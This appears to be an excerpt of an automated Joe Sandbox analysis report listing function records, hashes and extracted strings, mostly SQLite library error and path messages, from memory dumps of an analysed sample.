                                                        control_flow_graph 1217 7ff8a86edc50-7ff8a86edc7b 1218 7ff8a86edc7d-7ff8a86edc92 1217->1218 1219 7ff8a86edccb-7ff8a86edcef 1217->1219 1221 7ff8a86edcb4-7ff8a86edcc8 call 7ff8a880bb74 1218->1221 1222 7ff8a86edc94 call 7ff8a880bb74 1218->1222 1220 7ff8a86edcf4-7ff8a86edd18 ReadFile 1219->1220 1224 7ff8a86edd8a-7ff8a86edd8c 1220->1224 1225 7ff8a86edd1a-7ff8a86edd23 1220->1225 1221->1219 1227 7ff8a86edc99 1222->1227 1229 7ff8a86edd8e-7ff8a86eddb5 call 7ff8a86e94b0 1224->1229 1230 7ff8a86eddba-7ff8a86eddc3 1224->1230 1225->1224 1235 7ff8a86edd25-7ff8a86edd33 1225->1235 1231 7ff8a86edc9b-7ff8a86edcb3 1227->1231 1229->1230 1230->1227 1234 7ff8a86eddc9-7ff8a86eddde 00007FF8BA251730 1230->1234 1234->1231 1237 7ff8a86edd64-7ff8a86edd85 call 7ff8a86eda80 1235->1237 1238 7ff8a86edd35-7ff8a86edd3b 1235->1238 1237->1231 1240 7ff8a86edd43-7ff8a86edd46 1238->1240 1241 7ff8a86edd3d-7ff8a86edd41 1238->1241 1242 7ff8a86edd50-7ff8a86edd62 1240->1242 1243 7ff8a86edd48-7ff8a86edd4e 1240->1243 1241->1240 1241->1242 1242->1220 1243->1237 1243->1242
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730FileRead
                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                        • API String ID: 1073788972-1843600136
                                                        • Opcode ID: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
                                                        • Instruction ID: 05c6cfcb7abf673ba6fe4aaeebffebadca9535705b12af39abc54818127caea8
                                                        • Opcode Fuzzy Hash: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
                                                        • Instruction Fuzzy Hash: 30412932B09642A7FB209F19E4485A97B65FB44FC4F441132EA4D83798EF3CE445C758
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                        • API String ID: 4149376297-3207396689
                                                        • Opcode ID: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
                                                        • Instruction ID: a912e8cf4d9979106d1f0426e80b5b101934b5a0807b697989d9a5b56b2e0815
                                                        • Opcode Fuzzy Hash: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
                                                        • Instruction Fuzzy Hash: ACF15762A0E28697FF618A2895487BE7BE1EF517C4F082131DA8D476D1EF3CE845C724
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                        • API String ID: 4149376297-463513059
                                                        • Opcode ID: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
                                                        • Instruction ID: c47d534345cd2b1b4f70afd111d2c279f85783ab4e563b7c63176220a180df7e
                                                        • Opcode Fuzzy Hash: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
                                                        • Instruction Fuzzy Hash: 5AE12151B1E3C667EE0D8B3924191782BA0EB497C0F14917ADA9E437D2EF3CB512C324
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                        • API String ID: 4149376297-741541785
                                                        • Opcode ID: 5e4d16accfc88112ee46d3c2b3ae700bfc775f9f723ec424dcc118cf2f10295d
                                                        • Instruction ID: abea958929e13ff4d54e22ad1efed55eb215e6586e8e5025c3e5cae09911bee9
                                                        • Opcode Fuzzy Hash: 5e4d16accfc88112ee46d3c2b3ae700bfc775f9f723ec424dcc118cf2f10295d
                                                        • Instruction Fuzzy Hash: 3A029D72B0A742AAE714CB25E4546AD7BB1FB887C4F150236DA4D87B98DF7CE840CB14
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true
                                                        • Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3951195769-0
                                                        • Opcode ID: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
                                                        • Instruction ID: 007fbe656404c7dcd21b7163175a0f33d86744090ff9375f3d07da3f55fc2d9f
                                                        • Opcode Fuzzy Hash: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
                                                        • Instruction Fuzzy Hash: 5C314F7260AE8199EB608F61E8513ED7360FB84784F444439DA4D47B98EF38D568CB24
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                        • API String ID: 0-3733955532
                                                        • Opcode ID: 708413d303c7417d2bb93d3eeaa82d0879c85e3b6e291b5b0e36a592e6e7edd0
                                                        • Instruction ID: 71a2b9ecab8d26b3ba57ce716b67e131204bfb1f2f38e1413c171a5856362202
                                                        • Opcode Fuzzy Hash: 708413d303c7417d2bb93d3eeaa82d0879c85e3b6e291b5b0e36a592e6e7edd0
                                                        • Instruction Fuzzy Hash: D302A061B4BA82A1FB5A9B21E4947B973A0FF49BC0F085535DE4E06794DF3CE444C368
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true
                                                        • Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 349153199-0
                                                        • Opcode ID: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
                                                        • Instruction ID: 5e14b93ba207d7ddf16c58994355414f15f9b5858816fcd617be7ca48f6ef650
                                                        • Opcode Fuzzy Hash: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
                                                        • Instruction Fuzzy Hash: 0281C021E0FA437AFE54AB6694412B97290EF857C0F458035D96C833E6DF3CE8658728
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                        • API String ID: 4149376297-554953066
                                                        • Opcode ID: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
                                                        • Instruction ID: 107b3292339d73814825229b6ce8dec3dcba5651a0b63ca32e6f4727a457132a
                                                        • Opcode Fuzzy Hash: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
                                                        • Instruction Fuzzy Hash: 7C22C172A0AB81A6EB64DF25D4406BD77E4FB44BC8F405136DA8D47794EF38E890C724
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: new[]
                                                        • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                        • API String ID: 4059295235-3840279414
                                                        • Opcode ID: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
                                                        • Instruction ID: 92c97b9249cc074f9c4d83e1b29f8d376e7ef1fd36ea8229fc1271862a8b1dde
                                                        • Opcode Fuzzy Hash: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
                                                        • Instruction Fuzzy Hash: 7951F721F0E683A6FB159B61A4086B96B91EF44BC8F486035DD4D07686DFBCFC418329
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$PRAGMA "%w".page_count$misuse
                                                        • API String ID: 4149376297-3885987512
                                                        • Opcode ID: 1a1223a6a6bb04b4c8ff326a3c0eca170975add0c8d52055246356fb965cb68f
                                                        • Instruction ID: 8313546eefbf371a61606882b31247ed0727df2c548ef37a2c9aa39f9d3a8175
                                                        • Opcode Fuzzy Hash: 1a1223a6a6bb04b4c8ff326a3c0eca170975add0c8d52055246356fb965cb68f
                                                        • Instruction Fuzzy Hash: EC129C22B0BA42A5FB649B2695583B927A1FF44FC8F146131CE0D07799DF7CE845CB28
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                        • API String ID: 4149376297-3418467682
                                                        • Opcode ID: bdc43c00e068bcf9daa4ee6eb075ee9cb8e10da1e134680c0aeee87e4ea49667
                                                        • Instruction ID: 3d6cc09f7ea29cabd73c93bd330589579152c7f6d77315da95756aaa3d15463f
                                                        • Opcode Fuzzy Hash: bdc43c00e068bcf9daa4ee6eb075ee9cb8e10da1e134680c0aeee87e4ea49667
                                                        • Instruction Fuzzy Hash: A2D1CD7260A78696EB60CF29D014AA977B5FB88BC8F558036DF4D47394EF39E842C314
                                                        APIs
                                                        Strings
                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FF8A8744E5E
                                                        • foreign key on %s should reference only one column of table %T, xrefs: 00007FF8A8744E35
                                                        • unknown column "%s" in foreign key definition, xrefs: 00007FF8A874514C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                        • API String ID: 4149376297-272990098
                                                        • Opcode ID: 305c18b0e9f4f5604f50df11341a73f27d41104cfe2523d61a6f97d477ce37b0
                                                        • Instruction ID: d75a82894296e848d5890338862c697948d125d147b3d784ad5912680a487c7e
                                                        • Opcode Fuzzy Hash: 305c18b0e9f4f5604f50df11341a73f27d41104cfe2523d61a6f97d477ce37b0
                                                        • Instruction Fuzzy Hash: E3D11372A4B792A2EB60CB9590447B97BA1FB45BC4F484131DE5E03796DF3CE441C718
                                                        APIs
                                                        • 00007FF8BA251730.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FF8A8767F95,?,?,00000000), ref: 00007FF8A8767770
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %.*z:%u$column%d$rowid
                                                        • API String ID: 4149376297-2903559916
                                                        • Opcode ID: ff5d7ae2e35ebc63f28db2e85c6308ab8f11e9868eeecefcd88fb59e8b1ee1c9
                                                        • Instruction ID: d97017d3a1c1bb66533740f1d2b58d384b9d77ed0d1e23291a3f251f066ef64c
                                                        • Opcode Fuzzy Hash: ff5d7ae2e35ebc63f28db2e85c6308ab8f11e9868eeecefcd88fb59e8b1ee1c9
                                                        • Instruction Fuzzy Hash: 3CC1EE22A4A782A6FA65CB1590847B967A2FF41FD4F189235DE5D077C5EF3CE801C328
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: "%w" $%Q%s
                                                        • API String ID: 4149376297-1987291987
                                                        • Opcode ID: ca2e05b37137fcc4391813ead9a867555ccaf8c8f05afeaa331b5fd03ba256d6
                                                        • Instruction ID: 0569a0278180ee70cd8771eafaa4d60236728fdca944405fd67509a3c923f0ef
                                                        • Opcode Fuzzy Hash: ca2e05b37137fcc4391813ead9a867555ccaf8c8f05afeaa331b5fd03ba256d6
                                                        • Instruction Fuzzy Hash: B0C1DF72B4AB82A6EA14CF55A49067977A0FB45BE0F188235DE6E077D4DF3CE440C324
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                        • API String ID: 4149376297-3418467682
                                                        • Opcode ID: 82fe7f8e495bb442f5ac7ed3b0b0151c88c7131e13f43762d2f490f0b7604a72
                                                        • Instruction ID: 87204e52a0c3c3adc313af29cf362118edc34f7a1297ab89f1fea36e0ca688ca
                                                        • Opcode Fuzzy Hash: 82fe7f8e495bb442f5ac7ed3b0b0151c88c7131e13f43762d2f490f0b7604a72
                                                        • Instruction Fuzzy Hash: A7B1BE72B196A6A6EB60CB26A044B7A77A5FB84BC8F014135DF4D47B85EF3CD840C714
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
